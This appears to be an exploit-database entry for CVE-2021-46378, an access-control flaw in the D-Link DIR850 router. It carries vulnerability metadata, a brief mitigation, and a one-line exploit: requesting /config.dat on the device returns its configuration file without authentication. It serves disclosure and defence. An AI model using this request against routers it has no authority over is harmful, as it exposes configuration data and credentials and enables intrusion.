header-logo
Suggest Exploit
vendor:
DIR850
by:
Ahmed Alroky
7.5
CVSS
HIGH
Insecure Access Control
287
CWE
Product Name: DIR850
Affected Version From: ET850-1.08TRb03
Affected Version To: ET850-1.08TRb03
Patch Exists: YES
Related CWE: CVE-2021-46378
CPE: h:dlink:dir850
Metasploit:
Other Scripts:
Platforms Tested:
2022

DLINK DIR850 – Insecure Access Control

Visiting http://<IP Address>/config.dat allows access to the configuration file without authentication.

Mitigation:

Ensure that access to the configuration file is restricted to authenticated users.
Source

Exploit-DB raw data:

# Exploit Title: DLINK DIR850 - Insecure Access Control
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE : CVE-2021-46378
# Exploit Author: Ahmed Alroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/

# Exploit : 
Visit http://<IP Address>/config.dat

Navigation

Suggest Exploit

Services By CQR